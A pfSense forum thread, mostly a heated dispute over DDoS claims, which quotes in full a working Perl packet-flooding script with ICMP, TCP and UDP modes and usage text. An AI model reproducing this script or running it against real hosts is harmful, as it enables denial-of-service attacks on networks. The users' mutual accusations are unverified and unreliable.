Navigation

    Netgate Discussion Forum
    • Register
    • Login
    • Search
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Search

    What is the biggest attack in GBPS you stopped

    General pfSense Questions
    33
    737
    106133
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • H
      htilonom last edited by

      @doktornotor:

      And more blaaaaaah blaaaaaaaaah blaaaaaaaaaaaah….

      @Supermule:

      since I have allready stated I am not allowed to share the script.

      By whom? The criminals your rented the botnet from? Would the license be more expensive?  ::) ::) ::) ;D ;D ;D

      But at the same time Franco from opnsense has it since they will be releasing a "fix" hahaha

      1 Reply Last reply Reply Quote 0
      • S
        Supermule Banned last edited by

        Ashley Lorenzana actually said it well…

        “It's okay to disagree with the thoughts or opinions expressed by other people. That doesn't give you the right to deny any sense they might make. Nor does it give you a right to accuse someone of poorly expressing their beliefs just because you don't like what they are saying. Learn to recognize good writing when you read it, even if it means overcoming your pride and opening your mind beyond what is comfortable.”

        Friedrich Nietzsche carved it in stone "Convictions are more dangerous enemies of truth than lies."

        W. G. McAdoo  had it about right. This must be a trend among some. "It is impossible to defeat an ignorant man in an argument."

        To finish this off with Calvin Coolidge. "Nothing in the world can take the place of persistence. Talent will not; nothing is more common than unsuccessful men with talent. Genius will not; un-rewarded genius is almost a proverb. Education will not; the world is full of educated derelicts. Persistence and determination alone are omnipotent. "

        Make of it what you want.

        EOD.

        1 Reply Last reply Reply Quote 0
        • K
          kejianshi last edited by

          This is the sort of reply I'd expect from someone who's political views are being censored…  Not a tech rant.

          1 Reply Last reply Reply Quote 0
          • B
            bennyc last edited by

            @kejianshi:

            This is the sort of reply I'd expect from someone who's political views are being censored…  Not a tech rant.

            As is about 90% of this thread  ::)

            When in doubt, see: https://tools.ietf.org/html/rfc1925

            1 Reply Last reply Reply Quote 0
            • T
              tim.mcmanus last edited by

              1 Reply Last reply Reply Quote 0
              • D
                doktornotor Banned last edited by

                @Supermule:

                Ashley Lorenzana actually said it well…
                Friedrich Nietzsche carved it in stone
                W. G. McAdoo  had it about right.
                To finish this off with Calvin Coolidge

                1 Reply Last reply Reply Quote 0
                • F
                  firewalluser last edited by

                  This thread is a Textbook example… http://pastebin.com/irj4Fyd5

                  Capitalism, currently The World's best Entertainment Control System and YOU cant buy it! But you can buy this, or some of this or some of these

                  Asch Conformity, mainly the blind leading the blind.

                  1 Reply Last reply Reply Quote 0
                  • S
                    Supermule Banned last edited by

                    The funny shit is that most of the arguers of ESF has limited numbers of posts.

                    A lot of them has had their first post here.

                    And one even registered today to begin posting in this topic. I wonder why…..


                    1 Reply Last reply Reply Quote 0
                    • H
                      htilonom last edited by

                      @Supermule:

                      The funny shit is that most of the arguers of ESF has limited numbers of posts.

                      A lot of them has had their first post here.

                      And one even registered today to begin posting in this topic. I wonder why…..

                      Yea, I registered because you're out of control. For those who are unaware, please check out my Twitter profile where most of the time I spend talking about opnsense scams like the ones Supermule attempted here.

                      https://twitter.com/htilonom

                      1 Reply Last reply Reply Quote 0
                      • N
                        Nullity last edited by

                        …like staring wide-eyed into the sun

                        Please correct any obvious misinformation in my posts.
                        -Not a professional; an arrogant ignoramous.

                        1 Reply Last reply Reply Quote 0
                        • F
                          firewalluser last edited by

                          Following htilonom on twitter back to the account start last year and the dislike for anonabox started me wondering, then I found this thread with htilonom posting on it.

                          https://www.reddit.com/r/PFSENSE/comments/35dl17/pfsense_vs_opnsense_articles/

                          Theres a definite pattern.

                          Capitalism, currently The World's best Entertainment Control System and YOU cant buy it! But you can buy this, or some of this or some of these

                          Asch Conformity, mainly the blind leading the blind.

                          1 Reply Last reply Reply Quote 0
                          • ?
                            Guest last edited by

                            Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.

                            Hmmm, and what kind of script you where showing them all here in the forum in this post then? ???

                            DDoS pfSense dies on XSYN and OVH scripts.

                            1 Reply Last reply Reply Quote 0
                            • S
                              Supermule Banned last edited by

                              Not the one I was using but similar :)

                              1 Reply Last reply Reply Quote 0
                              • ?
                                Guest last edited by

                                Not the one I was using but similar :)

                                Ahh ok then this time here in this thread we are talking about another one, right?

                                1 Reply Last reply Reply Quote 0
                                • H
                                  htilonom last edited by

                                  @firewalluser:

                                  Following htilonom on twitter back to the account start last year and the dislike for anonabox started me wondering, then I found this thread with htilonom posting on it.

                                  https://www.reddit.com/r/PFSENSE/comments/35dl17/pfsense_vs_opnsense_articles/

                                  Theres a definite pattern.

                                  Can you elaborate? Not sure if you meant it in a good or a negative way…

                                  1 Reply Last reply Reply Quote 0
                                  • S
                                    Supermule Banned last edited by

                                    Yes. That was just an example of how easy it is to get a script that can be used to annoy people.

                                    @BlueKobold:

                                    Not the one I was using but similar :)

                                    Ahh ok then this time here in this thread we are talking about another one, right?

                                    1 Reply Last reply Reply Quote 0
                                    • ?
                                      Guest last edited by

                                      Ok it was only for my better understanding, why all peoples where talking to you, that you where not
                                      be at the willing to show the script and in another thread it was perhaps able to read for everyone.
                                      Thanks.

                                      Yes. That was just an example of how easy it is to get a script that can be used to annoy people.

                                      1 Reply Last reply Reply Quote 0
                                      • F
                                        firewalluser last edited by

                                        @Supermule:

                                        #!/usr/bin/perl -w

                                        =================================================

                                        simple network flooder script

                                        takes type of flood (icmp, tcp, udp) as param

                                        optionally takes dest ip and packet count

                                        =================================================

                                        my $VERSION = 0.5;

                                        =================================================

                                        use strict;
                                        use Net::RawIP;

                                        my $flood = shift or &usage();
                                        my $dstip = shift || '127.0.0.1';
                                        my $pktct = shift || 100;

                                        &icmpflood($dstip, $pktct) if $flood =~ 'icmp';
                                        &tcpflood($dstip, $pktct) if $flood =~ 'tcp';
                                        &udpflood($dstip, $pktct) if $flood =~ 'udp';

                                        sub icmpflood() {
                                          my($dstip, $pktct, $code, $type, $frag);
                                          $dstip = shift;
                                          $pktct = shift;

                                        print "\nstarting flood to $dstip\n";
                                          for(my $i=0; $i <= $pktct; $i++) {

                                        $code = int(rand(255));
                                              $type = int(rand(255));
                                              $frag = int(rand(2));

                                        my $packet = new Net::RawIP({
                                                ip => {
                                                    daddr => $dstip,
                                                    frag_off => $frag,
                                                },
                                                icmp => {
                                                    code => $code,
                                                    type => $type,
                                                }
                                              });

                                        $packet->send;
                                              print "sent icmp $type->$code, frag: $frag\n";
                                          }
                                          print "\nflood complete\n\n";
                                        }

                                        sub tcpflood() {
                                          my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
                                        $syn, $ack);
                                          $dstip = shift;
                                          $pktct = shift;
                                          print "\nstarting flood to $dstip\n";
                                          for(my $i=0; $i <= $pktct; $i++) {

                                        $sport = int(rand(65535));
                                              $dport = int(rand(65535));
                                              $frag = int(rand(2));
                                              $urg = int(rand(2));
                                              $psh = int(rand(2));
                                              $rst = int(rand(2));
                                              $fin = int(rand(2));
                                              $syn = int(rand(2));
                                              $ack = int(rand(2));

                                        my $packet = new Net::RawIP({
                                                ip => {
                                                    daddr => $dstip,
                                                    frag_off => $frag,
                                                },
                                                tcp => {
                                                    source => $sport,
                                                    dest => $dport,
                                                    urg => $urg,
                                                    psh => $psh,
                                                    rst => $rst,
                                                    fin => $fin,
                                                    syn => $syn,
                                                    ack => $ack,
                                                }
                                              });

                                        $packet->send;
                                              print "sent tcp packet from $sport to $dport, frag: $frag, psh:
                                        $psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
                                          }
                                          print "\nflood complete\n\n";
                                        }

                                        sub udpflood() {
                                          my($dstip, $pktct, $sport, $dport, $frag);
                                          $dstip = shift;
                                          $pktct = shift;

                                        print "\nstarting flood to $dstip\n";
                                          for(my $i=0; $i <= $pktct; $i++) {

                                        $sport = int(rand(255));
                                              $dport = int(rand(255));
                                              $frag = int(rand(2));

                                        my $packet = new Net::RawIP({
                                                ip => {
                                                    daddr => $dstip,
                                                    frag_off => $frag,
                                                },
                                                udp => {
                                                    source => $sport,
                                                    dest => $dport,
                                                }
                                              });

                                        $packet->send;
                                              print "sent udp packet from $sport to $dport, frag: $frag\n";
                                          }
                                          print "\nflood complete\n\n";
                                        }

                                        sub usage() {
                                          print "
                                        need to set a valid flood type (one of icmp, tcp, udp)
                                        optionally set dest ip and packetcount

                                        example:

                                        $0 [tcp udp icmp]  \n\n";
                                          exit 0;
                                        }

                                        A shared script. Page 21 in this thread as I've called SM out earlier on for not sharing the script, but saying that I didnt get taken down directly by the attacks but when I started to use some things in the gui namely RRD graph thats when the fw went unresponsive, my experiences are around pages June 2 (Pages 31-35 iirc).

                                        @firewalluser:

                                        You can stop it now for that ip address as I'm on another one.

                                        I dont think it was pingable we could for the next test make it pingable but the problem with ADSL is its faster down than up so you may not get consistent pings back anyway.

                                        When you say NAT'able what do you mean by that?

                                        I tried a variety of different settings throughout, like trying to access ip addresses that were closer to me than the ip addresses coming in to port 80, swapped the firewall optimisation around from aggressive to normal to high latency (satellite links) whilst trying to get out but no joy at getting any webpages up throughout, the odd DNS request packet got out seen as a green icon in the dynamic fw log.

                                        Interestingly it seemed to max out at 2.42Mbps yet various speed tests suggest I have a 5Mbps adsl connection. CPU was 100% through out.

                                        FW stayed responsive throughout with snort running, changing various rules made some of the dashboard interface graphs stop updating second by second to maybe updating 10seconds later but I get that anyway when updating some rules or changing things in snort.

                                        The only time I managed to kill the fw was trying to load the RRD graphs for All just a moment ago with the other fw webpages (dashboard, system activity, dynamic fw log) opened along with one or two other fw webpages open when changing rules etc, otherwise I'd have stayed on the old ip address for longer trying different things.

                                        Capitalism, currently The World's best Entertainment Control System and YOU cant buy it! But you can buy this, or some of this or some of these

                                        Asch Conformity, mainly the blind leading the blind.

                                        1 Reply Last reply Reply Quote 0
                                        • J
                                          jwt Netgate last edited by

                                          @Supermule:

                                          Franco was the only one willing to help get it upstream and the connection was made when I asked him politely.

                                          Nothing more in it.

                                          Brian, I won't tollerate hostility or lies.  You stated at least two things that aren't true in this post.

                                          You should retract what you've said that isn't true.

                                          1 Reply Last reply Reply Quote 0
                                          • J
                                            jwt Netgate last edited by

                                            This topic is now locked.

                                            1 Reply Last reply Reply Quote 0
                                            • First post
                                              Last post